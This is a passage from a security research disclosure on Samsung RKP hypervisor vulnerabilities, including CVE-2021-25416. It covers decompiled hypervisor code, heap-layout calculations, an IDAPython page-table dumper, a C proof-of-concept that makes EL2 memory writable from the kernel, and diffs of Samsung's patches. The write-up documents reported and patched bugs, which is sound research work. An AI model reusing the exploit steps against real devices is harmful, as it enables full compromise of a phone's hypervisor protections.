    if (!is_phys_map_l2(pmd)) {
      rkp_phys_map_unlock(pgd);
      return 0;
    }
    if (table_addr >= 0xffffff8000000000) {
      rkp_policy_violation("Never allow free kernel page table %lx", pmd);
    }
    if (is_phys_map_kernel(pmd)) {
      rkp_policy_violation("Entry must not point to kernel page table %lx", pmd);
    }
    res = rkp_phys_map_set(pmd, FREE);
    // ...
    res = rkp_s2_page_change_permission(pmd, 0, 1, 0);
    // ...
  }
  offset = 0;
  for (i = 0; i != 0x1000; i += 8) {
    addr = offset | start_addr & 0xffffffffc01fffff;
    res += check_single_l2e(pmd + i, addr, is_alloc);
    offset += 0x200000;
  }
  rkp_phys_map_unlock(pgd);
  return res;
}

rkp_l2pgt_process_table changes the type of the page in the physmap to FREE and sets the page as read-write in the page tables. It calls check_single_l2e again, that will do the same thing as before.

Choosing A Target Page

Because check_single_l2e sets the PXN bit of the descriptors (the content of our target page) and further processes values that looks like a table descriptor, we cannot directly target RKP's code. Interesting targets that are writable from EL2 includes RKP's page tables (the stage 2 page tables for EL1 or the page tables for EL2). But by definition, they contain valid descriptors so they are very likely to make RKP or the kernel crash at some point as the result of this processing.

The target page that we chose is the one containing the memory backing the protected_ranges memlist. It contains values that are aligned on 8 bytes, so they look like invalid descriptors. And by nullifying this list, we are then able to provide addresses located inside the hypervisor memory region to all the command handlers.

This memlist is allocated in the pa_restrict_init function:

int64_t pa_restrict_init() {
  memlist_init(&protected_ranges);
  memlist_add(&protected_ranges, 0x87000000, 0x200000);
  // ...
}

To know where the memory backing this memlist will be allocated, we need to dig into memlist_init:

int64_t memlist_init(memlist_t* list) {
  // ...

  memset(list, 0, sizeof(memlist_t));
  res = memlist_reserve(list, 5);
  list->capacity = 5;
  list->merged = 0;
  list->unkn_14 = 0;
  cs_init(&list->cs);
  return res;
}

The default capacity of memlists seems to be 5 entries. Since the protected_ranges memlist never contains more than 5 memory regions (even with the memory backing the physmap being added to it), it never gets reallocated so there's only ever one allocation. Let's see what memlist_reserve does:

int64_t memlist_reserve(memlist_t* list, uint64_t size) {
  // ...

  if (!list || !size) {
    return -1;
  }
  base = heap_alloc(0x20 * size, 0);
  if (!base) {
    return -1;
  }
  memset(base, 0, 0x20 * size);
  if (list->base) {
    for (index = 0; index < list->count; ++index) {
      new_entry = &base[index];
      old_entry = &list->base[index];
      new_entry->addr = old_entry->addr;
      new_entry->size = old_entry->size;
      new_entry->unkn_10 = old_entry->unkn_10;
      new_entry->extra = old_entry->extra;
    }
    heap_free(list->base);
  }
  list->base = base;
  return 0;
}

The memory allocated (5 x 32 bytes) for backing the memlist comes from the "static heap" allocator. When this allocation is made, the "static region" is made of:

  • the EL2 memory: 0x87000000-0x87200000;
  • minus the log region: 0x87100000-0x87140000;
  • minus the uH/RKP region: 0x87000000-0x87046000;
  • minus the "bigdata" region: 0x870FF000-87100000.

So the address returned by the allocator should be somewhere after 0x87046000 (between the uH/RKP and "bigdata" regions). To know at which offset exactly it will be, we need to look at the allocations done before pa_restrict_init.

By carefully tracing the execution, we find 4 allocations, all in the functions below:

int64_t uh_init(int64_t uh_base, int64_t uh_size) {
  // ...
  apps_init();
  uh_init_bigdata();
  uh_init_context();
  memlist_init(&uh_state.dynamic_regions);
  pa_restrict_init();
  // ...
}
uint64_t apps_init() {
  // ...
  res = uh_handle_command(i, 0, &saved_regs);
  // ...
}
int64_t uh_handle_command(uint64_t app_id, uint64_t cmd_id, saved_regs_t* regs) {
  // ...
  return cmd_handler(regs);
}
int64_t rkp_cmd_init() {
  // ...
  rkp_init_cmd_counts();
  // ...
}
uint8_t* rkp_init_cmd_counts() {
  // ...
  malloc(0x8a, 0);
  // ...
}
int64_t uh_init_bigdata() {
  if (!bigdata_state) {
    bigdata_state = malloc(0x230, 0);
  }
  memset(0x870ffc40, 0, 0x3c0);
  memset(bigdata_state, 0, 0x230);
  return s1_map(0x870ff000, 0x1000, UNKN3 | WRITE | READ);
}
int64_t* uh_init_context() {
  // ...

  uh_context = malloc(0x1000, 0);
  if (!uh_context) {
    uh_log('W', "RKP_1cae4f3b", 21, "%s RKP_148c665c", "uh_init_context");
  }
  return memset(uh_context, 0, 0x1000);
}
  • The first allocation of size 0x8A happens in rkp_init_cmd_counts.
  • The second allocation of size 0x230 happens in uh_init_bigdata.
  • The third allocation of size 0x1000 happens in uh_init_context.
  • The fourth allocation of size 0xA0 comes from memlist_init(&dynamic_regions).

Now we can calculate the offset. Each allocation has an header of 0x18 bytes, and the allocator rounds up the total size to the next 8-byte boundary. By doing the maths properly, we find the physical address where protected_ranges is allocated:

>>> f = lambda x: (x + 0x18 + 7) & 0xFFFFFFF8
>>> 0x87046000 + f(0x8A) + f(0x230) + f(0x1000) + f(0xA0) + 0x18
0x870473d8

We also need to know what's in the same page as the protected_ranges memlist. It is preceded by the uh_context which is memset and only used on panics. And it is followed by a memlist reallocation coming from init_cmd_add_dynamic_region, and a page-aligned allocation of a stage 2 page table coming from init_cmd_initialize_dynamic_heap. This means that there should be no value looking like a page table descriptor in this page (at least there wasn't on our test device).

Now that we have made the page containing the protected_ranges memlist writable in the stage 2, we can directly modify it from the kernel. The goal is to have check_kernel_input always return 0 so that we can give arbitrary addresses inside hypervisor memory to all the command handlers. check_kernel_input calls protected_ranges_contains, which itself calls memlist_contains_addr:

int64_t memlist_contains_addr(memlist_t* list, uint64_t addr) {
  // ...

  cs_enter(&list->cs);
  for (index = 0; index < list->count; ++index) {
    entry = &list->base[index];
    if (addr >= entry->addr && addr < entry->addr + entry->size) {
      cs_exit(&list->cs);
      return 1;
    }
  }
  cs_exit(&list->cs);
  return 0;
}

Since the first entry is the one spanning over the hypervisor memory, it looks like that by setting its size field (at offset 8) to zero, we will effectively disable the blacklist.

Getting Code Execution

The final step to fully compromise the hypervisor is to get arbitrary code execution. This can be achieved in multiple ways, but the simplest way is likely to manually modify the page tables of the stage 2 at EL1.

For example, we can target the level 2 descriptor that covers the memory range of the hypervisor and turn it into a writable block descriptor. The write itself can be performed by calling rkp_cmd_write_pgt3 since we have disabled the protected_ranges memlist. We can dump the initial stage 2 page tables at EL1 using an IDAPython script to find the physical address of the target descriptor:

import ida_bytes

sizes = [0x8000000000, 0x40000000, 0x200000, 0x1000]

def parse_static_s2_page_tables(table, level=1, start_vaddr=0):
    size = sizes[level]

    for i in range(512):
        desc_addr = table + i * 8
        desc = ida_bytes.get_qword(desc_addr)
        if (desc & 3) == 0 or (desc & 3) == 1:
            continue
        paddr = desc & 0xFFFFFFFFF000
        vaddr = start_vaddr + i * size

        if level < 3 and (desc & 3) == 3:
            print("L%d Table for %016x-%016x is at %08x" \
                  % (level + 1, vaddr, vaddr + size, paddr))
            parse_static_s2_page_tables(paddr, level + 1, vaddr)

parse_static_s2_page_tables(0x87028000)
L2 Table for 0000000000000000-0000000040000000 is at 87032000
L3 Table for 0000000002000000-0000000002200000 is at 87033000
L2 Table for 0000000080000000-00000000c0000000 is at 8702a000
L2 Table for 00000000c0000000-0000000100000000 is at 8702b000
L2 Table for 0000000880000000-00000008c0000000 is at 8702c000
L2 Table for 00000008c0000000-0000000900000000 is at 8702d000
L2 Table for 0000000900000000-0000000940000000 is at 8702e000
L2 Table for 0000000940000000-0000000980000000 is at 8702f000
L2 Table for 0000000980000000-00000009c0000000 is at 87030000
L2 Table for 00000009c0000000-0000000a00000000 is at 87031000

The L2 table mapping 0x80000000-0xc0000000 is at 0x8702a000. We get the descriptor's address, which depends on the target address (0x87000000) and the L2 block size (0x200000), by adding an offset to the L2 table address:

>>> 0x8702a000 + ((0x87000000 - 0x80000000) // 0x200000) * 8
0x8702a1c0

The descriptor's value is made of the target address and its attributes: 0x87000000 | 0x4fd = 0x870004fd.

0 1 00 11 1111 01 = 0x4fd
^ ^ ^  ^  ^    ^
| | |  |  |    `-- Type: block descriptor
| | |  |  `------- MemAttr[3:0]: NM, OWBC, IWBC
| | |  `---------- S2AP[1:0]: read/write
| | `------------- SH[1:0]: NS
| `--------------- AF: 1
`----------------- FnXS: 0

As mentioned above, we will do the write by calling rkp_cmd_write_pgt3. rkp_cmd_write_pgt3 calls rkp_l3pgt_write:

int64_t* rkp_l3pgt_write(uint64_t ptep, int64_t pte_val) {
  // ...
  ptep_pa = rkp_get_pa(ptep);
  rkp_phys_map_lock(ptep_pa);
  if (is_phys_map_l3(ptep_pa) || is_phys_map_free(ptep_pa)) {
    if ((pte_val & 3) != 3 || get_pxn_bit_of_desc(pte_val, 3)) {
      allowed = 1;
    } else {
      allowed = rkp_deferred_inited == 0;
    }
  } else {
    allowed = 0;
  }
  rkp_phys_map_unlock(ptep_pa);
  // ...
  if (!allowed) {
    pxn_bit = get_pxn_bit_of_desc(pte_val, 3);
    return rkp_policy_violation("Write L3 to wrong page type, %lx, %lx, %x", ptep_pa, pte_val, pxn_bit);
  }
  return set_entry_of_pgt(ptep_pa, pte_val);
}
uint64_t* set_entry_of_pgt(uint64_t* ptr, uint64_t val) {
  *ptr = val;
  return ptr;
}

ptep (the descriptor's address) is marked as FREE in the physmap, and pte_val (the descriptor's value) & 3 == 1, so we can call set_entry_of_pgt with our values.

Proof of Concept

For this simple proof of concept code, we're assuming that the attacker has an arbitrary read/write of kernel memory, as well as the ability to make hypervisor calls.

#define UH_APP_RKP 0xc300c002

#define RKP_CMD_NEW_PGD    0x0a
#define RKP_CMD_FREE_PGD   0x09
#define RKP_CMD_WRITE_PGT3 0x05

#define PROTECTED_RANGES_BITMAP 0x870473D8
#define BLOCK_DESC_ADDR         0x8702a1c0
#define BLOCK_DESC_DATA         0x870004fd

uint64_t pa_to_va(uint64_t va) {
    return pa - 0x80000000UL + 0xffffffc000000000UL;
}

void exploit() {
    /* allocate and clear our "fake PGD" */
    uint64_t pgd = kernel_alloc(0x1000);
    for (uint64_t i = 0; i < 0x1000; i += 8)
        kernel_write(pgd + i, 0UL);

    /* write our "fake PMD" descriptor */
    kernel_write(pgd, (PROTECTED_RANGES_BITMAP & 0xFFFFFFFFF000UL) | 3UL);

    /* make the hyp call that will set the page RO */
    kernel_hyp_call(UH_APP_RKP, RKP_CMD_NEW_PGD, pgd);
    /* make the hyp call that will set the page RW */
    kernel_hyp_call(UH_APP_RKP, RKP_CMD_FREE_PGD, pgd);

    /* zero out the "protected ranges" first entry */
    kernel_write(pa_to_va(PROTECTED_RANGES_BITMAP + 8), 0UL);

    /* write the descriptor to make hyp memory writable */
    kernel_hyp_call(UH_APP_RKP, RKP_CMD_WRITE_PGT3,
                    pa_to_va(BLOCK_DESC_ADDR), BLOCK_DESC_DATA);
}

The exploit was successfully tested on the most recent firmware available for our test device (at the time of the report): A515FXXU4CTJ1. The two-fold bug appeared to be present in the binaries of both Exynos and Snapdragon devices, including the S10/S10+/S20/S20+ flagship devices, but its exploitability on these devices is uncertain.

The prerequisites for exploiting this vulnerability are high: being able to make an hypervisor call with only an arbitrary read and write of kernel memory is no small feat on devices where JOPP/ROPP are enabled.

In particular, on Snapdragon devices, the s2_map function (called from rkp_s2_page_change_permission and rkp_s2_range_change_permission) makes an indirect call to a QHEE function (since it is QHEE that is in charge of the page tables). We did not follow this call to see if it made any additional checks. On the Galaxy S20, there is also an indirect call to the new hypervisor framework (called H-Arx), but we did not follow it either.

The memory layout will also be different on other devices than the one we have targeted in the exploit, so the hard-coded addresses won't work. But we believe that they can be adapted, or that an alternative exploitation strategy can be found for those devices.

Patch

Here are the immediate remediation steps we suggested to Samsung:

- Mark the pages unmapped by s2_unmap as S2UNMAP in the physmap
- Perform the additional checks of rkp_s2_page_change_permission in
rkp_s2_range_change_permission as well
- Add calls to check_kernel_input in the rkp_lxpgt_process_table functions

First Patch

To see how Samsung patched this vulnerability, we binary diffed the most recent firmware available for the Samsung Galaxy S10 (at the time of checking the first patch): G973FXXSBFUF3. We could not use the latest firmware for the Samsung Galaxy A51 as this device had not been updated to the June patch level yet.

There have been some changes to rkp_s2_page_change_permission (and none to rkp_s2_range_change_permission):

int64_t rkp_s2_page_change_permission(void* p_addr,
                                      uint64_t access,
+                                      uint32_t type,
                                      uint32_t exec,
                                      uint32_t allow) {
  // ...

  if (!allow && !rkp_inited) {
    // ...
-    return -1;
+    return rkp_phys_map_set(p_addr, type) ? -1 : 0;
  }
  if (is_phys_map_s2unmap(p_addr)) {
    // ...
-    return -1;
+    return rkp_phys_map_set(p_addr, type) ? -1 : 0;
  }
  if (page_allocator_is_allocated(p_addr) == 1
        || (p_addr >= TEXT_PA && p_addr < ETEXT_PA)
        || (p_addr >= rkp_get_pa(SRODATA) && p_addr < rkp_get_pa(ERODATA))
-    return 0;
+    return rkp_phys_map_set(p_addr, type) ? -1 : 0;
  // ...
+  if (access == 0x80) {
+    if (rkp_phys_map_set(p_addr, type) || rkp_set_pgt_bitmap(p_addr, access))
+      return -1;
+  }
  if (map_s2_page(p_addr, p_addr, 0x1000, attrs) < 0) {
    rkp_policy_violation("map_s2_page failed, p_addr : %p, attrs : %d", p_addr, attrs);
    return -1;
  }
  tlbivaae1is(((p_addr + 0x80000000) | 0xFFFFFFC000000000) >> 12);
-  return rkp_set_pgt_bitmap(p_addr, access);
+  if (access != 0x80)
+    if (rkp_phys_map_set(p_addr, type) || rkp_set_pgt_bitmap(p_addr, access))
+      return -1;
+  return 0;
  • the new physmap type is given as argument to the function;
  • on failure of the checks (there are unchanged themselves), the new physmap type is set anyway;
  • if the access is read-only, the physmap type is set, then the page is set as 0 in the ro_bitmap, and finally the page is mapped in the stage 2;
  • if the access is read-write, the page is mapped in the stage 2, then it is set as 1 in the ro_bitmap, and finally the physmap type is set.

So far, nothing in the changes prevent using these 2 functions remap previously unmapped memory.

There have also been some changes to the rkp_lxpgt_process_table functions:

int64_t rkp_l1pgt_process_table(int64_t pgd, uint32_t high_bits, uint32_t is_alloc) {
  // ...
  if (is_alloc) {
+    check_kernel_input(pgd);
    // ...
  } else {
    // ...
  }
  // ...
}
int64_t rkp_l2pgt_process_table(int64_t pmd, uint64_t start_addr, uint32_t is_alloc) {
  // ...
  if (is_alloc) {
+    check_kernel_input(pmd);
    // ...
  } else {
    // ...
  }
}
int64_t rkp_l3pgt_process_table(int64_t pte, uint64_t start_addr, uint32_t is_alloc, int32_t protect) {
  // ...
  if (is_alloc) {
+    check_kernel_input(pte);
    // ...
  } else {
    // ...
  }
  // ...
}

For the allocation path, the rkp_lxpgt_process_table functions now call check_kernel_input before changing the permissions of the page and processing it. This makes it so that we can't reuse the same exploit path to call rkp_s2_page_change_permission, but does nothing about the other ways to call it.

During binary diffing, we did not find a change that fixes the actual issue: pages unmapped in the stage 2 were still not marked as S2UNMAP in the physmap. So we started looking for a new exploitation strategy to demonstrate to Samsung that their fix was not sufficient. While we did not implement and test it on a real device due to a lack of time, we devised the theoretical approach explained below.

Finding A New Exploit Path

As explained in the Exploring Our Options section, the set_range_to_rox_l3 and set_range_to_pxn_l3 functions can also be used to reach a call to rkp_s2_page_change_permission, but with some major caveats.

For set_range_to_pxn_l3 (called from rkp_set_range_to_pxn):

  • our target page memory must be marked KERNEL|L3 in the physmap;
  • we must write a user-controlled descriptor into the kernel page tables;
  • the "dynamic load" feature is only available on Exynos devices.

For set_range_to_rox_l3 (called from rkp_set_range_to_rox):

  • our target page will be set as read-only in the stage 2;
  • we must write a user-controlled descriptor into the kernel page tables;
  • the "dynamic load" feature is only available on Exynos devices.

Nevertheless, these two functions are our only remaining options, so let's see how we can work around their quirks.

Writing The Kernel Page Tables

For our new exploitation strategy, we need a region of kernel virtual memory of the size of a level 2 block that is currently unmapped in the kernel page tables. Let's call this region's virtual address kernel_va. This range has an invalid/empty descriptor in the kernel level 2 page tables. Let's call that descriptor's virtual address l2_desc_pa.

We will change this invalid descriptor into a table descriptor, whose output address (the address of the level 3 page table) is our target page location in hypervisor memory that we want to remap and make writable from the kernel. Let's call this physical address target_pa.

To make this change, we can use the rkp_cmd_write_pgt2 command. It calls rkp_l2pgt_write with the following arguments:

  • the virtual address of the level 2 descriptor: l2_desc_pa;
  • the new descriptor value: target_pa | 3.

Since we are writing to a legitimate level 2 table, l2_desc_pa is marked as KERNEL|L2 in the physmap. The old descriptor value is 0, and the new one isn't, so we end up with a call to check_single_l2e with the following arguments:

  • a pointer to the new descriptor value on the stack;
  • the virtual address that the descriptor maps: kernel_va;
  • is_alloc == 1.

If we chose kernel_va so that it is not contained in the executable_regions memlist, the PXN bit of the new descriptor value is set. Then, because the new descriptor value is a table, we end up with a call to rkp_l3pgt_process_table with the following arguments:

  • the descriptor output address: target_pa;
  • the virtual address that the descriptor maps: kernel_va;
  • is_alloc == 1;
  • protect == 0.

Because protect == 0, rkp_l3pgt_process_table will simply return early. Finally, rkp_l2pgt_write will write the new value of the descriptor, before returning.

Remapping Memory As Writable

Our setup is ready: we have a PMD marked as KERNEL|L2 in the physmap containing a descriptor pointing to a PTE located in hypervisor memory. We can now remap the memory as writable by abusing the "dynamic executable" commands (available only on Exynos). We will first remap the memory as read-only using the dynamic_load_ins function, then change it to read-write using the dynamic_load_rm function.

The code path that needs to be taken is as follows:

rkp_cmd_dynamic_load
    |> dynamic_load_ins
        |> dynamic_load_check
            code range must be in the binary range
            must not overlap another "dynamic executable"
            must not be in the ro_bitmap
        |> dynamic_load_protection
            will make the code range as RO (and add it to ro_bitmap)
        |> dynamic_load_verify_signing
            if type != 3, no signature checking
        |> dynamic_load_make_rox
            calls rkp_set_range_to_rox!
        |> dynamic_load_add_executable
            code range added to the executable_regions
        |> dynamic_load_add_dynlist
            code range added to the dynamic_load_regions
rkp_cmd_dynamic_load
    |> dynamic_load_rm
        |> dynamic_load_rm_dynlist
            code range is removed from dynamic_load_regions
        |> dynamic_load_rm_executable
            code range is removed from executable_regions
        |> dynamic_load_set_pxn
            calls rkp_set_range_to_pxn!
        |> dynamic_load_rw
            will make the code range as RW (and remove it from ro_bitmap)

We need to pass the virtual address range starting at kernel_va to the dynamic_load_xxx functions. Because this range is currently unused, it will be marked as FREE in the physmap at the time of the call. Thus, all the checks should pass, and the functions rkp_set_range_to_rox and rkp_set_range_to_pxn will be called. They will remap in the stage 2 our "fake PTE", target_pa, as read-only first (in rkp_set_range_to_rox), then as read-write (in rkp_set_range_to_pxn).

As was already happening in the original exploit, if the target page contains quad-word values that looks like valid level 3 page table descriptors, then their PXN bit might be set. In that case, the target page needs to be writable by the hypervisor. We still target the page containing the memory backing the protected_ranges bitmap.

Second Patch

To see how Samsung patched this vulnerability this time around, we binary diffed the most recent firmware available for the Samsung Galaxy S10: G973FXXSEFUJ2.

There have been some changes to rkp_s2_page_change_permission:

int64_t rkp_s2_page_change_permission(void* p_addr,
                                      uint64_t access,
-                                      uint32_t exec,
-                                      uint32_t allow) {
+                                      uint32_t exec) {
  // ...

-  if (!allow && !rkp_inited) {
+  if (!rkp_deferred_inited) {
    // ...
  }
+  check_kernel_input(p_addr);
  // ...
}

The function now calls check_kernel_input, which will ensure that the physical address is not in the protected_ranges memlist.

There have been some changes to rkp_s2_range_change_permission as well:

int64_t rkp_s2_range_change_permission(uint64_t start_addr,
                                       uint64_t end_addr,
                                       uint64_t access,
                                       uint32_t exec,
                                       uint32_t allow) {
  // ...
-  if (!allow && !rkp_inited) {
-    uh_log('L', "rkp_paging.c", 593, "s2 range change access not allowed before init");
-    rkp_policy_violation("Range change permission prohibited");
-  } else if (allow != 2 && rkp_deferred_inited) {
-    uh_log('L', "rkp_paging.c", 603, "s2 change access not allowed after def-init");
-    rkp_policy_violation("Range change permission prohibited");
-  }
+  if (rkp_deferred_inited) {
+    if (allow != 2) {
+      uh_log('L', "rkp_paging.c", 643, "RKP_33605b63");
+      rkp_policy_violation("Range change permission prohibited");
+    }
+    if (start_addr > end_addr) {
+      uh_log('L', "rkp_paging.c", 650, "RKP_b3952d08%llxRKP_dd15365a%llx",
+             start_addr, end_addr - start_addr);
+      rkp_policy_violation("Range change permission prohibited");
+    }
+    protected_ranges_overlaps(start_addr, end_addr - start_addr);
+    addr = start_addr;
+    do {
+      rkp_phys_map_lock(addr);
+      if (is_phys_map_s2unmap(addr))
+        rkp_policy_violation("RKP_1b62896c %p", addr);
+      rkp_phys_map_unlock(addr);
+      addr += 0x1000;
+    } while (addr < end_addr);
+  }
  // ...
}

+int64_t protected_ranges_overlaps(uint64_t addr, uint64_t size) {
+    if (memlist_overlaps_range(&protected_ranges, addr, size)) {
+        uh_log('L', "pa_restrict.c", 122, "RKP_03f2763e%lx RKP_a54942c8%lx", addr, size);
+        return uh_log('D', "pa_restrict.c", 124, "RKP_03f2763e%lxRKP_c5d4b9a4%lx", addr, size);
+    }
+    return 0;
+}

The function now calls protected_ranges_overlaps, which will ensure that the physical address range does not overlap with the protected_ranges memlist, and panic if it does. Furthermore, a check has also been added to ensure that none of the pages of the physical address range are marked as S2UNMAP in the physmap.

Writing executable kernel pages

SVE-2021-20179 (CVE-2021-25416): Possible creating executable kernel page via abusing dynamic load functions

Severity: Moderate
Affected versions: Q(10.0), R(11.0) devices with Exynos9610, 9810, 9820, 9830
Reported on: January 5, 2021
Disclosure status: Privately disclosed.
Assuming EL1 is compromised, an improper address validation in RKP prior to SMR JUN-2021 Release 1 allows local attackers to create executable kernel page outside code area.
The patch adds the proper address validation in RKP to prevent creating executable kernel page.

Vulnerability

We found this vulnerability while investigating the "dynamic executable" feature of RKP. It allows the kernel to load Samsung-signed executable binaries into memory. It is only used for the Fully Interactive Mobile Camera (FIMC) subsystem, and since this subsystem is only part of the Exynos device, this feature is not implemented on Snapdragon.

In the kernel sources, we can find some examples of loading/unloading a "dynamic executable" in the functions fimc_is_load_ddk_bin and fimc_is_load_rta_bin:

// from include/linux/rkp.h
typedef struct dynamic_load_struct{
    u32 type;
    u64 binary_base;
    u64 binary_size;
    u64 code_base1;
    u64 code_size1;
    u64 code_base2;
    u64 code_size2;
} rkp_dynamic_load_t;

// from drivers/media/platform/exynos/fimc-is2/interface/fimc-is-interface-library.c
int fimc_is_load_ddk_bin(int loadType)
{
    // ...
#ifdef CONFIG_UH_RKP
    rkp_dynamic_load_t rkp_dyn;
    static rkp_dynamic_load_t rkp_dyn_before = {0};
#endif
    // ...
    if (loadType == BINARY_LOAD_ALL) {
#ifdef CONFIG_UH_RKP
        memset(&rkp_dyn, 0, sizeof(rkp_dyn));
        rkp_dyn.binary_base = lib_addr;
        rkp_dyn.binary_size = bin.size;
        rkp_dyn.code_base1 = memory_attribute[INDEX_ISP_BIN].vaddr;
        rkp_dyn.code_size1 = memory_attribute[INDEX_ISP_BIN].numpages * PAGE_SIZE;
#ifdef USE_ONE_BINARY
        rkp_dyn.type = RKP_DYN_FIMC_COMBINED;
        rkp_dyn.code_base2 = memory_attribute[INDEX_VRA_BIN].vaddr;
        rkp_dyn.code_size2 = memory_attribute[INDEX_VRA_BIN].numpages * PAGE_SIZE;
#else
        rkp_dyn.type = RKP_DYN_FIMC;
#endif
        if (rkp_dyn_before.type)
            uh_call(UH_APP_RKP, RKP_DYNAMIC_LOAD, RKP_DYN_COMMAND_RM,(u64)&rkp_dyn_before, 0, 0);
        memcpy(&rkp_dyn_before, &rkp_dyn, sizeof(rkp_dynamic_load_t));
#endif
        ret = fimc_is_memory_attribute_nxrw(&memory_attribute[INDEX_ISP_BIN]);
        if (ret) {
            err_lib("failed to change into NX memory attribute (%d)", ret);
            return ret;
        }

#ifdef USE_ONE_BINARY
        ret = fimc_is_memory_attribute_nxrw(&memory_attribute[INDEX_VRA_BIN]);
        if (ret) {
            err_lib("failed to change into NX memory attribute (%d)", ret);
            return ret;
        }
#endif
        // ...
        if (bin.size <= bin_size) {
            memcpy((void *)lib_addr, bin.data, bin.size);
            __flush_dcache_area((void *)lib_addr, bin.size);
        }
        // ...
#ifdef CONFIG_UH_RKP
        ret = uh_call(UH_APP_RKP, RKP_DYNAMIC_LOAD, RKP_DYN_COMMAND_INS, (u64)&rkp_dyn, 0, 0);
        if (ret) {
            err_lib("fail to load verify FIMC in EL2");
        }
#else
        // ...
#endif
        // ...
}

The kernel first fills a rkp_dynamic_load_t structure with the information about the binary to load. If the binary is already loaded, it unloads it by making a uh_call with the command RKP_DYNAMIC_LOAD and the subcommand RKP_DYN_COMMAND_RM. It then makes the memory RW- and copies the binary's code and data segments into it. Finally, it makes the binary code executable by making a uh_call with the command RKP_DYNAMIC_LOAD and the subcommand RKP_DYN_COMMAND_INS.

// from init/main.c
#ifdef CONFIG_UH_RKP
rkp_init_t rkp_init_data __rkp_ro = {
    // ...
    .no_fimc_verify = 0,
    // ...
};
// ...
static void __init rkp_init(void)
{
    // ...
    uh_call(UH_APP_RKP, RKP_START, (u64)&rkp_init_data, (u64)kimage_voffset, 0, 0);
}
// ...
#endif

The hypervisor will verify the binary's integrity, if it wasn't disabled by the kernel during initialization by setting to 1 the no_fimc_verify field of the rkp_init_t structure given to the RKP_START command (which was the case in some of the kernel sources we have seen).

Back to the hypervisor, the handler that will process the RKP_DYNAMIC_LOAD command and its subcommands is rkp_cmd_dynamic_load:

int64_t rkp_cmd_dynamic_load(saved_regs_t* regs) {
  // ...

  type = regs->x2;
  rkp_dyn = (rkp_dynamic_load_t*)rkp_get_pa(regs->x3);
  if (type == RKP_DYN_COMMAND_BREAKDOWN_BEFORE_INIT) {
    res = dynamic_breakdown_before_init(rkp_dyn);
    if (res) {
      uh_log('W', "rkp_dynamic.c", 392, "dynamic_breakdown_before_init failed");
    }
  } else if (type == RKP_DYN_COMMAND_INS) {
    res = dynamic_load_ins(rkp_dyn);
    if (!res) {
      uh_log('L', "rkp_dynamic.c", 406, "dynamic_load ins type:%d success", rkp_dyn->type);
    }
  } else if (type == RKP_DYN_COMMAND_RM) {
    res = dynamic_load_rm(rkp_dyn);
    if (!res) {
      uh_log('L', "rkp_dynamic.c", 400, "dynamic_load rm type:%d success", rkp_dyn->type);
    }
  } else {
    res = 0;
  }
  ret_va = regs->x4;
  if (ret_va) {
    *virt_to_phys_el1(ret_va) = res;
  }
  regs->x0 = res;
  return res;
}

There is one other subcommand, RKP_DYN_COMMAND_BREAKDOWN_BEFORE_INIT, but it is not interesting because it can only be called before RKP is initialized.

int64_t dynamic_load_ins(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  if (dynamic_load_check(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 273, "dynamic_load_check failed");
    return 0xf13c0001;
  }
  if (dynamic_load_protection(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 280, "dynamic_load_protection failed");
    res = 0xf13c0002;
    goto EXIT_RW;
  }
  if (dynamic_load_verify_signing(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 288, "dynamic_load_verify_signing failed");
    res = 0xf13c0003;
    goto EXIT_RW;
  }
  if (dynamic_load_make_rox(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 295, "dynamic_load_make_rox failed");
    res = 0xf13c0004;
    goto EXIT_SET_PXN;
  }
  if (dynamic_load_add_executable(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 303, "dynamic_load_add_executable failed");
    res = 0xf13c0005;
    goto EXIT_RM_EXECUTABLE;
  }
  if (dynamic_load_add_dynlist(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 309, "dynamic_load_add_dynlist failed");
    res = 0xf13c0006;
    goto EXIT_RM_DYNLIST;
  }
  return 0;

EXIT_RM_DYNLIST:
  if (dynamic_load_rm_dynlist(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 317, "fail to dynamic_load_rm_dynlist, later in dynamic_load_ins");
  }
EXIT_RM_EXECUTABLE:
  if (dynamic_load_rm_executable(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 320, "fail to dynamic_load_rm_executable, later in dynamic_load_ins");
  }
EXIT_SET_PXN:
  if (dynamic_load_set_pxn(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 323, "fail to dynamic_load_set_pxn, later in dynamic_load_ins");
  }
EXIT_RW:
  if (dynamic_load_rw(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 326, "fail to dynamic_load_rw, later in dynamic_load_ins");
  }
  return res;
}

In the nominal case, dynamic_load_ins calls a bunch of functions sequentially:

If any of these functions fail, except the dynamic_load_check one, the hypervisor will try to undo what it has done so far by calling some or all of these other functions:

The vulnerability is once again two-fold:

  • memory that is currently R-X or RW- in the stage 2 will be made R-X by dynamic_load_protection, but on the first error dynamic_load_rw will be called and will make it RWX, regardless of its original permissions;
  • it is possible to give read-only memory in the stage 2 to these functions because the dynamic_load_check function doesn't validate the executable properly.
int64_t dynamic_load_check(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  if (rkp_dyn->type == RKP_DYN_MODULE) {
    return -1;
  }
  binary_base_pa = rkp_get_pa(rkp_dyn->binary_base);
  if (memlist_overlaps_range(&dynamic_load_regions, binary_base_pa, rkp_dyn->binary_size)) {
    uh_log('L', "rkp_dynamic.c", 71, "dynamic_load[%p~%p] is overlapped with another", binary_base_pa,
           rkp_dyn->binary_size);
    return -1;
  }
  if (pgt_bitmap_overlaps_range(binary_base_pa, rkp_dyn->binary_size)) {
    uh_log('D', "rkp_dynamic.c", 76, "dynamic_load[%p~%p] is ro", binary_base_pa, rkp_dyn->binary_size);
  }
  return 0;
}

dynamic_load_check checks if the executable's binary range overlaps with any of the currently loaded executables. It also checks if the binary range overlaps with read-only memory in the stage 2. Unfortunately this checking is faulty: it doesn't ensure that code segments are located within the binary range.

Please note that the call to uh_log that happens if pgt_bitmap_overlaps_range returned a non-zero value, is done with 'D' as the first argument, meaning that uh_log will call uh_panic and the hypervisor will panic.

int64_t dynamic_load_protection(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  code_base1_pa = rkp_get_pa(rkp_dyn->code_base1);
